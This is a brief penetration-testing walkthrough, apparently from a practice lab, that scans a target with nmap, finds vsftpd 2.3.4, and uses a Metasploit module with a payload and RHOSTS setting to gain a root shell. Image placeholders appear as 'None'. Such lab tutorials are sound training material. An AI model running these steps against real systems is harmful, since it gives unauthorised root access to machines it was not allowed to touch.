1. SCANNING

use nmap tool to scan the ip address

nmap ip -A
None
we found many ports open and ftp version is given
ftp version - vsftpd 2.3.4

2. Launch Metasploit Framework

msfconsole

launch msfconsole and search the version of ftp

None
1 module is found use that
use  0 (module number)
None
show payloads
None
now we have to set the payload
set payload 0
None

After setting payload we need to check options Required for payload working

None

set RHOSTS

set RHOSTS <target ip>
None

use the run or exploit command

None

now we are root